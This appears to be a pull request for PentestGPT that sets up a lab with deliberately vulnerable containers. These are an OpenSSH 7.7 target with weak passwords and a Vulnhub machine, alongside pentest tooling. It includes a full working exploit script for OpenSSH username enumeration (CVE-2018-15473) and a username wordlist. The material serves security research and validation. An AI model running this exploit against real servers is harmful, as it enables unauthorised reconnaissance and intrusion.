### PR TITLE
Add devcontainer to simplify reproduction

### DIFF
--- a/.devcontainer/Dockerfile
+++ b/.devcontainer/Dockerfile
@@ -5,7 +5,9 @@ RUN apt-get update && export DEBIAN_FRONTEND=noninteractive \
     && apt-get -y install --no-install-recommends \
         net-tools python3 python3-pip \
         curl gnupg nmap bandit locales \
-        cloc sloccount less iputils-ping
+        cloc sloccount less iputils-ping \
+        software-properties-common netdiscover \
+        dirb ftp host vim netcat ssh
 
 # # Install Metasploit
 # RUN curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > /tmp/msfinstall \
@@ -23,3 +25,7 @@ RUN echo "en_US.UTF-8 UTF-8" >> /etc/locale.gen && locale-gen
 ENV LANG en_US.UTF-8
 ENV LANGUAGE en_US:en
 ENV LC_ALL en_US.UTF-8
+
+RUN add-apt-repository ppa:mozillateam/ppa -y
+RUN echo "Package: *\nPin: release o=LP-PPA-mozillateam\nPin-Priority: 1001\n\nPackage: firefox\nPin: version 1:1snap1-0ubuntu2\nPin-Priority: -1" > /etc/apt/preferences.d/mozilla-firefox
+RUN apt-get update && apt-get install -y firefox firefox-geckodriver

--- a/.devcontainer/Dockerfile
+++ b/.devcontainer/Dockerfile
@@ -1,0 +1,25 @@
+FROM ubuntu:22.04
+
+# [Optional] Uncomment this section to install additional OS packages.
+RUN apt-get update && export DEBIAN_FRONTEND=noninteractive \
+    && apt-get -y install --no-install-recommends \
+        net-tools python3 python3-pip \
+        curl gnupg nmap bandit locales \
+        cloc sloccount less iputils-ping
+
+# # Install Metasploit
+# RUN curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > /tmp/msfinstall \
+#     && chmod 755 /tmp/msfinstall \
+#     && /tmp/msfinstall
+
+# # [Optional] If your pip requirements rarely change, uncomment this section to add them to the image.
+# #  alternatively, this also helps avoid having to pull requirements from the internet every single time
+COPY requirements.txt /tmp/pip-tmp/
+RUN pip3 --disable-pip-version-check --no-cache-dir install -r /tmp/pip-tmp/requirements.txt \
+   && rm -rf /tmp/pip-tmp
+RUN pip3 install bandit trufflehog3
+
+RUN echo "en_US.UTF-8 UTF-8" >> /etc/locale.gen && locale-gen
+ENV LANG en_US.UTF-8
+ENV LANGUAGE en_US:en
+ENV LC_ALL en_US.UTF-8

--- a/.devcontainer/devcontainer.json
+++ b/.devcontainer/devcontainer.json
@@ -1,0 +1,75 @@
+// For format details, see https://aka.ms/devcontainer.json. For config options, see the README at:
+// https://github.com/microsoft/vscode-dev-containers/tree/v0.241.1/containers/python-3
+{
+	"name": "pentestGPT_devenv",	
+	// "build": {
+	// 	"dockerfile": "Dockerfile",
+	// 	"context": "..",
+	// 	"args": { 
+	// 		// Update 'VARIANT' to pick a Python version: 3, 3.10, 3.9, 3.8, 3.7, 3.6
+	// 		// Append -bullseye or -buster to pin to an OS version.
+	// 		// Use -bullseye variants on local on arm64/Apple Silicon.
+	// 		"VARIANT": "3.10-bullseye",
+	// 		// Options
+	// 		"NODE_VERSION": "lts/*"
+	// 	}
+	// },
+
+	"dockerComposeFile": ["./docker-compose.yml"],
+	"service": "devenv",
+	// "shutdownAction": "none",  // don't shut down container when vscode is closed
+	"workspaceFolder": "/workspace",
+
+	// Configure tool-specific properties.
+	"customizations": {
+		// Configure properties specific to VS Code.
+		"vscode": {
+			// Set *default* container specific settings.json values on container create.
+			"settings": { 
+				"python.defaultInterpreterPath": "/usr/local/bin/python",
+				"python.linting.enabled": true,
+				"python.linting.pylintEnabled": true,
+				"python.formatting.autopep8Path": "/usr/local/py-utils/bin/autopep8",
+				"python.formatting.blackPath": "/usr/local/py-utils/bin/black",
+				"python.formatting.yapfPath": "/usr/local/py-utils/bin/yapf",
+				"python.linting.banditPath": "/usr/local/py-utils/bin/bandit",
+				"python.linting.flake8Path": "/usr/local/py-utils/bin/flake8",
+				"python.linting.mypyPath": "/usr/local/py-utils/bin/mypy",
+				"python.linting.pycodestylePath": "/usr/local/py-utils/bin/pycodestyle",
+				"python.linting.pydocstylePath": "/usr/local/py-utils/bin/pydocstyle",
+				"python.linting.pylintPath": "/usr/local/py-utils/bin/pylint"
+			},
+			
+			// Add the IDs of extensions you want installed when the container is created.
+			"extensions": [
+				"ms-python.python",
+				"ms-toolsai.jupyter-renderers",
+				"ms-toolsai.jupyter",
+				"ms-python.vscode-pylance",
+				"ms-vscode.cmake-tools",
+				"leafvmaple.verilog",
+				"mshr-h.VerilogHDL",
+				"GitHub.copilot"
+			]
+		}
+	},
+
+	// Use 'forwardPorts' to make a list of ports inside the container available locally.
+	// "forwardPorts": [],
+
+	// Use 'postCreateCommand' to run commands after the container is created.
+	// "postCreateCommand": "pip3 install --user -r requirements.txt",  // doing it instead in 
+																		// the dockerfile to cache
+																		// requirements in container
+
+	// // Comment out to connect as root instead. More info: https://aka.ms/vscode-remote/containers/non-root.
+	// "remoteUser": "vscode"
+
+	// "runArgs": ["--privileged"],
+	"runArgs": [
+		"--privileged",
+		"-e", "DISPLAY=host.docker.internal:0",
+		"-v", "/tmp/.X11-unix:/tmp/.X11-unix"
+	]
+
+}

--- a/.devcontainer/docker-compose.yml
+++ b/.devcontainer/docker-compose.yml
@@ -1,0 +1,46 @@
+version: '3'
+
+#################
+# SERVICES
+#################
+services:
+
+  # Developer environment
+  devenv:
+    build:
+      context: ..
+      dockerfile: .devcontainer/Dockerfile
+    volumes:
+      # Mount the root folder that contains .git
+      - ..:/workspace:cached
+    command: /bin/sh -c "while sleep 10; do :; done"
+    networks:
+      exploitflownet:
+        ipv4_address: 192.168.2.5
+    cap_add:
+      - NET_ADMIN
+      # - ALL
+
+  # Collaborative robot target
+  openssh:
+    container_name: openssh 
+    build:
+      context: ..
+      dockerfile: .devcontainer/targets/openssh/Dockerfile
+    environment: 
+      - ROOT_PASSWORD=vulhub
+    # ports:  # map port in the container to the host system
+    #   - "20022:22"    
+    networks:
+      exploitflownet:
+        ipv4_address: 192.168.2.10
+
+#################
+# NETWORKS
+#################
+networks:
+  exploitflownet:
+    ipam:
+      driver: default
+      config:
+        - subnet: 192.168.2.0/24

--- a/.devcontainer/docker-compose.yml
+++ b/.devcontainer/docker-compose.yml
@@ -15,13 +15,13 @@ services:
       - ..:/workspace:cached
     command: /bin/sh -c "while sleep 10; do :; done"
     networks:
-      exploitflownet:
+      pentestgpt:
         ipv4_address: 192.168.2.5
     cap_add:
       - NET_ADMIN
       # - ALL
 
-  # Collaborative robot target
+  # OpenSSH vulnerable machine (CVE-2018-15473)
   openssh:
     container_name: openssh 
     build:
@@ -32,14 +32,28 @@ services:
     # ports:  # map port in the container to the host system
     #   - "20022:22"    
     networks:
-      exploitflownet:
+      pentestgpt:
         ipv4_address: 192.168.2.10
+
+  # Vulnhub vulnerable machine (Hackable II)
+  hackableii:
+    container_name: hackableii
+    image: vmayoral/vulnhub:hackableii
+    command: |
+      /bin/bash -c "rm -r /var/lock; mkdir -p /var/lock; chmod 755 /var/lock; /etc/init.d/apache2 start; /etc/init.d/ssh start; /etc/init.d/runproftpd.sh; /etc/init.d/php7.0-fpm start; while sleep 10; do :; done"
+    ports:  # map port in the container to the host system
+      - "80:80"
+    networks:
+      pentestgpt:
+        ipv4_address: 192.168.2.11
+    mac_address: 08:00:27:85:55:86
+
 
 #################
 # NETWORKS
 #################
 networks:
-  exploitflownet:
+  pentestgpt:
     ipam:
       driver: default
       config:

--- a/.devcontainer/requirements.txt
+++ b/.devcontainer/requirements.txt
@@ -1,0 +1,14 @@
+requests
+pyyaml
+playwright==1.28.0
+sqlmap
+black
+loguru
+beautifulsoup4~=4.11.2
+colorama
+rich
+prompt-toolkit
+google
+pytest
+openai
+langchain

--- a/.devcontainer/requirements.txt
+++ b/.devcontainer/requirements.txt
@@ -12,3 +12,4 @@ google
 pytest
 openai
 langchain
+paramiko

--- a/.devcontainer/targets/openssh/Dockerfile
+++ b/.devcontainer/targets/openssh/Dockerfile
@@ -1,0 +1,9 @@
+FROM vulhub/openssh:7.7
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+RUN set -ex \
+    && adduser --home /home/vulhub --shell /bin/bash --disabled-password --gecos "" vulhub \
+    && echo "vulhub:vulhub" | chpasswd \
+    && adduser --home /home/example --shell /bin/bash --disabled-password --gecos "" example \
+    && echo "example:123456" | chpasswd

--- a/.devcontainer/targets/openssh/exploit.py
+++ b/.devcontainer/targets/openssh/exploit.py
@@ -1,0 +1,203 @@
+#!/usr/bin/env python3
+"""
+derived from work done by Matthew Daley
+https://bugfuzz.com/stuff/ssh-check-username.py
+
+props to Justin Gardner for the add_boolean workaround
+
+CVE-2018-15473
+--------------
+OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an
+invalid authenticating user until after the packet containing the request has been fully parsed, related to
+auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
+
+Author: epi
+    https://epi052.gitlab.io/notes-to-self/
+    https://gitlab.com/epi052/cve-2018-15473
+"""
+import sys
+import re
+import socket
+import logging
+import argparse
+import multiprocessing
+from typing import Union
+from pathlib import Path
+
+import paramiko
+
+assert sys.version_info >= (3, 6), "This program requires python3.6 or higher"
+
+
+class Color:
+    """ Class for coloring print statements.  Nothing to see here, move along. """
+    BOLD = '\033[1m'
+    ENDC = '\033[0m'
+    RED = '\033[38;5;196m'
+    BLUE = '\033[38;5;75m'
+    GREEN = '\033[38;5;149m'
+    YELLOW = '\033[38;5;190m'
+
+    @staticmethod
+    def string(string: str, color: str, bold: bool = False) -> str:
+        """ Prints the given string in a few different colors.
+
+        Args:
+            string: string to be printed
+            color:  valid colors "red", "blue", "green", "yellow"
+            bold:   T/F to add ANSI bold code
+
+        Returns:
+            ANSI color-coded string (str)
+        """
+        boldstr = Color.BOLD if bold else ""
+        colorstr = getattr(Color, color.upper())
+        return f'{boldstr}{colorstr}{string}{Color.ENDC}'
+
+
+class InvalidUsername(Exception):
+    """ Raise when username not found via CVE-2018-15473. """
+
+
+def apply_monkey_patch() -> None:
+    """ Monkey patch paramiko to send invalid SSH2_MSG_USERAUTH_REQUEST.
+
+        patches the following internal `AuthHandler` functions by updating the internal `_handler_table` dict
+            _parse_service_accept
+            _parse_userauth_failure
+
+        _handler_table = {
+            MSG_SERVICE_REQUEST: _parse_service_request,
+            MSG_SERVICE_ACCEPT: _parse_service_accept,
+            MSG_USERAUTH_REQUEST: _parse_userauth_request,
+            MSG_USERAUTH_SUCCESS: _parse_userauth_success,
+            MSG_USERAUTH_FAILURE: _parse_userauth_failure,
+            MSG_USERAUTH_BANNER: _parse_userauth_banner,
+            MSG_USERAUTH_INFO_REQUEST: _parse_userauth_info_request,
+            MSG_USERAUTH_INFO_RESPONSE: _parse_userauth_info_response,
+        }
+    """
+
+    def patched_add_boolean(*args, **kwargs):
+        """ Override correct behavior of paramiko.message.Message.add_boolean, used to produce malformed packets. """
+
+    auth_handler = paramiko.auth_handler.AuthHandler
+    old_msg_service_accept = auth_handler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
+
+    def patched_msg_service_accept(*args, **kwargs):
+        """ Patches paramiko.message.Message.add_boolean to produce a malformed packet. """
+        old_add_boolean, paramiko.message.Message.add_boolean = paramiko.message.Message.add_boolean, patched_add_boolean
+        retval = old_msg_service_accept(*args, **kwargs)
+        paramiko.message.Message.add_boolean = old_add_boolean
+        return retval
+
+    def patched_userauth_failure(*args, **kwargs):
+        """ Called during authentication when a username is not found. """
+        raise InvalidUsername(*args, **kwargs)
+
+    auth_handler._client_handler_table.update({
+        paramiko.common.MSG_SERVICE_ACCEPT: patched_msg_service_accept,
+        paramiko.common.MSG_USERAUTH_FAILURE: patched_userauth_failure
+    })
+
+
+def create_socket(hostname: str, port: int) -> Union[socket.socket, None]:
+    """ Small helper to stay DRY.
+
+    Returns:
+        socket.socket or None
+    """
+    # spoiler alert, I don't care about the -6 flag, it's really
+    # just to advertise in the help that the program can handle ipv6
+    try:
+        return socket.create_connection((hostname, port))
+    except socket.error as e:
+        print(f'socket error: {e}', file=sys.stdout)
+
+
+def connect(username: str, hostname: str, port: int, verbose: bool = False, **kwargs) -> None:
+    """ Connect and attempt keybased auth, result interpreted to determine valid username.
+
+    Args:
+        username:   username to check against the ssh service
+        hostname:   hostname/IP of target
+        port:       port where ssh is listening
+        key:        key used for auth
+        verbose:    bool value; determines whether to print 'not found' lines or not
+
+    Returns:
+        None
+    """
+    sock = create_socket(hostname, port)
+    if not sock:
+        return
+
+    transport = paramiko.transport.Transport(sock)
+
+    try:
+        transport.start_client()
+    except paramiko.ssh_exception.SSHException:
+        return print(Color.string(f'[!] SSH negotiation failed for user {username}.', color='red'))
+
+    try:
+        transport.auth_publickey(username, paramiko.RSAKey.generate(1024))
+    except paramiko.ssh_exception.AuthenticationException:
+        print(f"[+] {Color.string(username, color='yellow')} found!")
+    except InvalidUsername:
+        if not verbose:
+            return
+        print(f'[-] {Color.string(username, color="red")} not found')
+
+
+def main(**kwargs):
+    """ main entry point for the program """
+    sock = create_socket(kwargs.get('hostname'), kwargs.get('port'))
+    if not sock:
+        return
+
+    banner = sock.recv(1024).decode()
+
+    regex = re.search(r'-OpenSSH_(?P<version>\d\.\d)', banner)
+    if regex:
+        try:
+            version = float(regex.group('version'))
+        except ValueError:
+            print(f'[!] Attempted OpenSSH version detection; version not recognized.\n[!] Found: {regex.group("version")}')
+        else:
+            ver_clr = 'green' if version <= 7.7 else 'red'
+            print(f"[+] {Color.string('OpenSSH', color=ver_clr)} version {Color.string(version, color=ver_clr)} found")
+    else:
+        print(f'[!] Attempted OpenSSH version detection; version not recognized.\n[!] Found: {Color.string(banner, color="yellow")}')    
+
+    apply_monkey_patch()
+
+    if kwargs.get('username'):
+        kwargs['username'] = kwargs.get('username').strip()
+        return connect(**kwargs)
+
+    with multiprocessing.Pool(kwargs.get('threads')) as pool, Path(kwargs.get('wordlist')).open() as usernames:
+        host = kwargs.get('hostname')
+        port = kwargs.get('port')
+        verbose = kwargs.get('verbose')
+        pool.starmap(connect, [(user.strip(), host, port, verbose) for user in usernames])
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description="OpenSSH Username Enumeration (CVE-2018-15473)")
+
+    parser.add_argument('hostname', help='target to enumerate', type=str)
+    parser.add_argument('-p', '--port', help='ssh port (default: 22)', default=22, type=int)
+    parser.add_argument('-t', '--threads', help="number of threads (default: 4)", default=4, type=int)
+    parser.add_argument('-v', '--verbose', action='store_true', default=False,
+                        help="print both valid and invalid usernames (default: False)")
+    parser.add_argument('-6', '--ipv6', action='store_true', help="Specify use of an ipv6 address (default: ipv4)")
+
+    multi_or_single_group = parser.add_mutually_exclusive_group(required=True)
+    multi_or_single_group.add_argument('-w', '--wordlist', type=str, help="path to wordlist")
+    multi_or_single_group.add_argument('-u', '--username', help='a single username to test', type=str)
+
+    args = parser.parse_args()
+
+    logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
+
+    main(**vars(args))

--- a/.devcontainer/targets/openssh/input.txt
+++ b/.devcontainer/targets/openssh/input.txt
@@ -1,0 +1,6 @@
+root
+victor
+gpt
+debian
+vulhub
+nobody


### PR DESCRIPTION
Included docker-composer setup that automatically launches a `CVE-2018-15473` vulnerable machine (openssh, user enum).

| simplified setup  | test target vulnerable to  `CVE-2018-15473` |
|---|---|
|  ![May-01-2023 19-58-58](https://user-images.githubusercontent.com/1375246/235502582-f1c19645-22e3-49d4-b052-b43f94e400dd.gif) | ![target](https://user-images.githubusercontent.com/1375246/235502606-75866cd6-d10c-4c79-81d2-6c4a45b566fa.gif) |


Both, the devenv for PentestGPT as well as the vulnerable machine as deployed in a simulated network. This setup is but a PoC and can be used for further emulated scenarios for validation purposes